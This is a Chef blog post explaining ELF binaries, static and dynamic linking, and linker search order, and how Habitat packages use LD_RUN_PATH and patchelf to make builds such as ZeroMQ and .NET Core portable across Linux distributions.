Recently I joined the Habitat team at Chef and one of the first things I did to get the feel of using Habitat to build software was to start creating Habitat build plans. The first plan I set out to create was .NET Core. I would soon find out that building .NET Core from source on Linux was probably a bad choice for a first plan. It uses clang instead of GCC, it has lots of cmake files that expect binaries to live in /usr/lib, and it downloads built executables that do not link to Habitat packaged dependencies. Right out of the gate, I got all sorts of build errors as I plodded forward. Most of these errors centered around a common theme: "I can't find X." There were all sorts of issues beyond linking too that I won't get into here, but I'm convinced that if I had known the basics of what this post will attempt to explain, I would have had a MUCH easier time with all the errors and pitfalls I faced.

What is linking and what are ELF binaries?

First let's define our terms:

ELF

There are no "Lord of the Rings" references to be had here. ELF is the Extensible and linkable format and defines how binary files are structured on Linux/Unix. This can include executable files, shared libraries, object files and more. An ELF file contains a set of headers and a number of sections for things like text, data, etc. One of the key roles of an ELF binary is to inform the operating system how to load a program into memory including all of the symbols it must link to.

Linking

Linking is a key part of the process of building an executable. The other key part is compiling. Often we refer to both jointly as "compiling" but they are really two distinct operations. First the compiler takes source code files and turns them into machine language instructions in the form of object files. These object files alone are not very useful for running a program.

Linking takes the object files (some might be from source code you wrote) and links them together with external library files to create a functioning program. If your source code calls a function from an external library, the compiler gleefully assumes that function exists and moves on. If it doesn't exist, don't worry, the linker will let you know.

Often when we hear about linking, two types are mentioned: static and dynamic. Static linking takes the external machine instructions and embeds them directly into the built executable. If all external dependencies of a program were statically linked, there would be only one executable file and no need for any dependent shared object files to be referenced.

However, we usually dynamically link our external dependencies. Dynamic linking does not embed the external code into the final executable. Instead it just points to an external shared object (.so) file (or .dll file on Windows) and loads that code into the running process at runtime. This has the benefit of being able to update external dependencies without having to ship and package your application each time a dependency is updated. Dynamic linking also results in a smaller application binary since it does not contain the external code.
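A quick way to see the two approaches side by side on any Linux box with GCC installed (hello.c being any trivial program):

gcc hello.c -o hello                 # dynamically linked by default
gcc -static hello.c -o hello_static  # statically linked; no .so files needed at runtime
ldd hello                            # lists the shared objects the loader will bring in
ldd hello_static                     # reports "not a dynamic executable"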

On Unix/Linux systems, the ELF format specifies the metadata that governs what libraries will be linked. These libraries can be in many places on the machine and may exist in more than one place. The metadata in the ELF binary will help determine exactly what files are linked when that binary is executed.

Habitat + dynamic linking = portability

Habitat leverages dynamic linking to provide true application portability. It might not be immediately obvious what this means, why it is important, or if it is even a good thing. So let's start by describing how applications typically load their dependencies in a normal environment and the role that configuration management systems like Chef play in these environments.

How you manage dependencies today

Let's say you have written an application that depends on the ZeroMQ library. You might use apt-get or yum to install ZeroMQ and its binaries are likely dropped somewhere into /usr. Now you can build and run your application and it will consume the ZeroMQ libraries installed. Unless it is told otherwise, the linker will scan the trusted Linux library locations for shared object files to link.

To illustrate this, I have built ZeroMQ from source and it produced libzmq.so.5 and put it in /usr/local/lib. If I examine that shared object with ldd, I can see where it links to its dependencies:

mwrock@ultrawrock:~$ ldd /usr/local/lib/libzmq.so.5
 linux-vdso.so.1 =>  (0x00007ffffe05f000)
 libunwind.so.8 => /usr/lib/x86_64-linux-gnu/libunwind.so.8 (0x00007f7e92370000)
 libsodium.so.18 => /usr/local/lib/libsodium.so.18 (0x00007f7e92100000)
 librt.so.1 => /lib/x86_64-linux-gnu/librt.so.1 (0x00007f7e91ef0000)
 libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007f7e91cd0000)
 libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007f7e91ac0000)
 libstdc++.so.6 => /usr/lib/x86_64-linux-gnu/libstdc++.so.6 (0x00007f7e917a0000)
 libm.so.6 => /lib/x86_64-linux-gnu/libm.so.6 (0x00007f7e91490000)
 libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f7e910c0000)
 /lib64/ld-linux-x86-64.so.2 (0x00007f7e92a00000)
 liblzma.so.5 => /lib/x86_64-linux-gnu/liblzma.so.5 (0x00007f7e90e80000)
 libgcc_s.so.1 => /lib/x86_64-linux-gnu/libgcc_s.so.1 (0x00007f7e90c60000)

They are all linked to the dependencies found in the Linux trusted library locations.

Now the time comes to move to production and just like you needed to install the ZeroMQ libraries in your dev environment, you will need to do the same on your production nodes. We all know this drill and we have probably all been burned at some point – something new is deployed to production and either its dependencies were not there or they were but they were the wrong version.

Configuration Management as solution

Chef fixes this, right? Kind of… it's complicated.

You can absolutely have Chef make sure that your application's dependencies are installed with the correct versions. But what if you have different applications or services on the same node that depend on a different version of the same dependency? It may not be possible to have multiple versions coexist in /usr/lib. Maybe your new version will work or maybe it won't. Especially for some of the lower level dependencies, there is simply no guarantee that compatible versions will exist. If anything, there is one guarantee: different distros will have different versions.

Keeping the automation with the application

Even more important – you want these dependencies to travel with your application. Ideally I want to install my application and know that by virtue of installing it, everything it needs is there and has not stomped over the dependencies of anything else. I do not want to delegate the installation of its dependencies and the knowledge of which version to install to a separate management layer. Instead, Habitat binds dependencies with the application so that there is no question what your application needs, and installing your application includes the installation of all of its dependencies. Let's look at how this works and see how dynamic linking is at play.

When you build a habitat plan, your plan will specify each dependency required by your application in your application's plan:

pkg_deps=(core/glibc core/gcc-libs core/libsodium)

Then when Habitat packages your build into its final, deployable artifact (.hart file), that artifact will include a list of every dependent Habitat package (including the exact version and release):

[35][default:/src:0]# cat /hab/pkgs/mwrock/zeromq/4.1.4/20161225135834/DEPS
core/glibc/2.22/20160612063629
core/gcc-libs/5.2.0/20161208223920
core/libsodium/1.0.8/20161214075415

At install time, Habitat installs your application package and also the packages included in its dependency manifest (the DEPS file shown above) in the pkgs folder under Habitat's root location. Here it will not conflict with any previously installed binaries on the node that might live in /usr. Further, the Habitat build process links your application to these exact package dependencies and ensures that at runtime, these are the exact binaries your application will load.

[36][default:/src:0]# ldd /hab/pkgs/mwrock/zeromq/4.1.4/20161225135834/lib/libzmq.so.5
 linux-vdso.so.1 (0x00007fffd173c000)
 libsodium.so.18 => /hab/pkgs/core/libsodium/1.0.8/20161214075415/lib/libsodium.so.18 (0x00007f8f47ea4000)
 librt.so.1 => /hab/pkgs/core/glibc/2.22/20160612063629/lib/librt.so.1 (0x00007f8f47c9c000)
 libpthread.so.0 => /hab/pkgs/core/glibc/2.22/20160612063629/lib/libpthread.so.0 (0x00007f8f47a7e000)
 libstdc++.so.6 => /hab/pkgs/core/gcc-libs/5.2.0/20161208223920/lib/libstdc++.so.6 (0x00007f8f47704000)
 libm.so.6 => /hab/pkgs/core/glibc/2.22/20160612063629/lib/libm.so.6 (0x00007f8f47406000)
 libc.so.6 => /hab/pkgs/core/glibc/2.22/20160612063629/lib/libc.so.6 (0x00007f8f47061000)
 libgcc_s.so.1 => /hab/pkgs/core/gcc-libs/5.2.0/20161208223920/lib/libgcc_s.so.1 (0x00007f8f46e4b000)
 /hab/pkgs/core/glibc/2.22/20160612063629/lib64/ld-linux-x86-64.so.2 (0x0000560174705000)

Habitat guarantees that the same binaries that were linked at build time, will be linked at run time. Even better, it just happens and you don't need a separate management layer to enforce this.

This is how a Habitat package provides portability. Installing and running a Habitat package brings all of its dependencies with it. They do not all live in the same .hart package, but your application's .hart package includes the necessary metadata to let Habitat know what other packages to download and install from the depot. These dependencies may or may not already exist on the node with varying versions, but it doesn't matter because a Habitat application only relies on the packages that reside within Habitat. And even within the Habitat environment, you can have multiple applications that rely on the same dependency but different versions, and these applications can run side by side.

The challenge of portability and the Habitat studio

So when you are building a Habitat plan into a hart package, what keeps that build from pulling dependencies from the default Linux lib directories? What if you do not specify these dependencies in your plan and the build links them from elsewhere? That could break our portability. If your application magically links against libraries in a non-Habitat controlled location, then there is no guarantee that those dependencies will be present when you install your application elsewhere. Habitat constructs a build environment called a "studio" to protect against this exact scenario.

The Habitat studio is a clean room environment. The only libraries you will find in this environment are those managed by Habitat. You will find /lib and /usr/lib totally empty here:

[37][default:/src:0]# ls /lib -la
total 8
drwxr-xr-x  2 root root 4096 Dec 24 22:46 .
drwxr-xr-x 26 root root 4096 Dec 24 22:46 ..
lrwxrwxrwx  1 root root    3 Dec 24 22:46 lib -> lib
[38][default:/src:0]# ls /usr/lib -la
total 8
drwxr-xr-x 2 root root 4096 Dec 24 22:46 .
drwxr-xr-x 9 root root 4096 Dec 24 22:46 ..
lrwxrwxrwx 1 root root    3 Dec 24 22:46 lib -> lib

Habitat installs several packages into the studio including several familiar Linux utilities and build tools. Every utility and library that Habitat loads into the studio is a Habitat package itself.

[1][default:/src:0]# ls /hab/pkgs/core/
acl       cacerts    gawk      gzip            libbsd         mg       readline    vim
attr      coreutils  gcc-libs  hab             libcap         mpfr     sed         wget
bash      diffutils  glibc     hab-backline    libidn         ncurses  tar         xz
binutils  file       gmp       hab-plan-build  linux-headers  openssl  unzip       zlib
bzip2     findutils  grep      less            make           pcre     util-linux

This can be a double edged sword. On the one hand it protects us from undeclared dependencies being missed by our package. The darker side is that your plan may be building source that has build scripts that expect dependencies or other build tools to exist in their "usual" homes. If you are unfamiliar with how the standard Linux linker scans for dependencies, discovering what is wrong with your build may be less than obvious.

The rules of dependency scanning

So before we go any further, let's take a look at how the linker works and how Habitat configures its build environment to influence where it finds dependencies at both build and run time. The linker looks at a combination of environment variables, CLI options and well known directory paths, in a strict order of precedence. Here is a direct quote from the ld (the linker binary) man page:

The linker uses the following search paths to locate required shared libraries:

1. Any directories specified by -rpath-link options.
2. Any directories specified by -rpath options.  The difference between -rpath and -rpath-link is that directories specified by -rpath options are included in the executable and used at runtime, whereas the -rpath-link option is only effective at link time. Searching -rpath in this way is only supported by native linkers and cross linkers which have been configured with the --with-sysroot option.
3. On an ELF system, for native linkers, if the -rpath and -rpath-link options were not used, search the contents of the environment variable "LD_RUN_PATH".
4. On SunOS, if the -rpath option was not used, search any directories specified using -L options.
5. For a native linker, search the contents of the environment variable "LD_LIBRARY_PATH".
6. For a native ELF linker, the directories in "DT_RUNPATH" or "DT_RPATH" of a shared library are searched for shared libraries needed by it. The "DT_RPATH" entries are ignored if "DT_RUNPATH" entries exist.
7. The default directories, normally /lib and /usr/lib.
8. For a native linker on an ELF system, if the file /etc/ld.so.conf exists, the list of directories found in that file.

At build time Habitat sets the $LD_RUN_PATH variable to the library path of every dependency that the building plan depends on. We can see this in Habitat's build output when we build a Habitat plan:

zeromq: Setting LD_RUN_PATH=/hab/pkgs/mwrock/zeromq/4.1.4/20161225135834/lib:/hab/pkgs/core/glibc/2.22/20160612063629/lib:/hab/pkgs/core/gcc-libs/5.2.0/20161208223920/lib:/hab/pkgs/core/libsodium/1.0.8/20161214075415/lib

This means that at run time, when you run your application built by habitat, it will load from the "habetized" packaged dependencies. This is because setting the $LD_RUN_PATH influences how the ELF metadata is constructed and causes it to point to these Habitat package paths.
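You can confirm what the build wrote into the ELF metadata by dumping the dynamic section of the built library, which should show a RUNPATH (or RPATH) entry pointing at the /hab/pkgs/... library directories recorded at build time:

readelf -d /hab/pkgs/mwrock/zeromq/4.1.4/20161225135834/lib/libzmq.so.5 | grep -E 'RPATH|RUNPATH'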

Patching pre-built binaries

Habitat not only allows one to build packages from source but also supports "binary-only" packages. These are packages that are made up of binaries downloaded from some external binary repository or distribution site. These are ideal for closed-source software or software that may be too complicated or takes too long to build. However, Habitat cannot control the linking process for these binaries. If you try to execute these binaries in a Habitat studio, you may see runtime failures.

The dotnet-core package is a good example of this. I ended up giving up on building that plan from source and instead just downloaded the binaries from the public .NET distribution site. Running ldd on the dotnet binary, we see:

[8][default:/src:0]# ldd /hab/pkgs/mwrock/dotnet-core/1.0.0-preview3-003930/20161225145648/bin/dotnet
/hab/pkgs/core/glibc/2.22/20160612063629/bin/ldd: line 117: /hab/pkgs/mwrock/dotnet-core/1.0.0-preview3-003930/20161225145648/bin/dotnet: No such file or directory

Well that's not very clear. ldd isn't even able to show us any of the linked dependencies, because the glibc interpreter that the ELF metadata says to use does not exist at the path the metadata points to:

[9][default:/src:1]# file /hab/pkgs/mwrock/dotnet-core/1.0.0-preview3-003930/20161225145648/bin/dotnet
/hab/pkgs/mwrock/dotnet-core/1.0.0-preview3-003930/20161225145648/bin/dotnet: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=db256f0ac90cd718d8ec2d157b29437ea8bcb37f, not stripped

/lib64/ld-linux-x86-64.so.2 does not exist. We can manually fix this even after a binary is built with a tool called patchelf. We will declare a build dependency in our plan on core/patchelf and then we can use the following command:

find -type f -name 'dotnet' \
  -exec patchelf --interpreter "$(pkg_path_for glibc)/lib/ld-linux-x86-64.so.2" {} \;

Now let's try ldd again:

[16][default:/src:130]# ldd /hab/pkgs/mwrock/dotnet-core/1.0.0-preview3-003930/20161225151837/bin/dotnet
 linux-vdso.so.1 (0x00007ffe421eb000)
 libdl.so.2 => /hab/pkgs/core/glibc/2.22/20160612063629/lib/libdl.so.2 (0x00007fcb0b2cc000)
 libpthread.so.0 => /hab/pkgs/core/glibc/2.22/20160612063629/lib/libpthread.so.0 (0x00007fcb0b0af000)
 libstdc++.so.6 => not found
 libm.so.6 => /hab/pkgs/core/glibc/2.22/20160612063629/lib/libm.so.6 (0x00007fcb0adb1000)
 libgcc_s.so.1 => not found
 libc.so.6 => /hab/pkgs/core/glibc/2.22/20160612063629/lib/libc.so.6 (0x00007fcb0aa0d000)
 /hab/pkgs/core/glibc/2.22/20160612063629/lib/ld-linux-x86-64.so.2 (0x00007fcb0b4d0000)

This is better. It now links our glibc dependencies to the Habitat packaged glibc binaries, but there are still a couple dependencies that the linker could not find. At least now we can see more clearly what they are.

There is another argument we can pass to patchelf, --set-rpath, that can edit the ELF metadata as if $LD_RUN_PATH had been set when the binary was built:

find -type f -name 'dotnet' \
  -exec patchelf --interpreter "$(pkg_path_for glibc)/lib/ld-linux-x86-64.so.2" --set-rpath "$LD_RUN_PATH" {} \;
find -type f -name '*.so*' \
  -exec patchelf --set-rpath "$LD_RUN_PATH" {} \;

So we set the rpath to the $LD_RUN_PATH set in the Habitat environment. We will also make sure to do this for each *.so file in the directory where we downloaded the distributable binaries. Finally ldd now finds all of our dependencies:

[19][default:/src:130]# ldd /hab/pkgs/mwrock/dotnet-core/1.0.0-preview3-003930/20161225152801/bin/dotnet
 linux-vdso.so.1 (0x00007fff3e9a4000)
 libdl.so.2 => /hab/pkgs/core/glibc/2.22/20160612063629/lib/libdl.so.2 (0x00007f1e68834000)
 libpthread.so.0 => /hab/pkgs/core/glibc/2.22/20160612063629/lib/libpthread.so.0 (0x00007f1e68617000)
 libstdc++.so.6 => /hab/pkgs/core/gcc-libs/5.2.0/20161208223920/lib/libstdc++.so.6 (0x00007f1e6829d000)
 libm.so.6 => /hab/pkgs/core/glibc/2.22/20160612063629/lib/libm.so.6 (0x00007f1e67f9f000)
 libgcc_s.so.1 => /hab/pkgs/core/gcc-libs/5.2.0/20161208223920/lib/libgcc_s.so.1 (0x00007f1e67d89000)
 libc.so.6 => /hab/pkgs/core/glibc/2.22/20160612063629/lib/libc.so.6 (0x00007f1e679e5000)
 /hab/pkgs/core/glibc/2.22/20160612063629/lib/ld-linux-x86-64.so.2 (0x00007f1e68a38000)

Every dependency, down to something as low-level as glibc, is a Habitat packaged binary declared in our own application's (dotnet-core here) dependencies. This should be fully portable across any 64-bit Linux distribution.

The post Habitat application portability and understanding dynamic linking of ELF binaries appeared first on Chef Blog.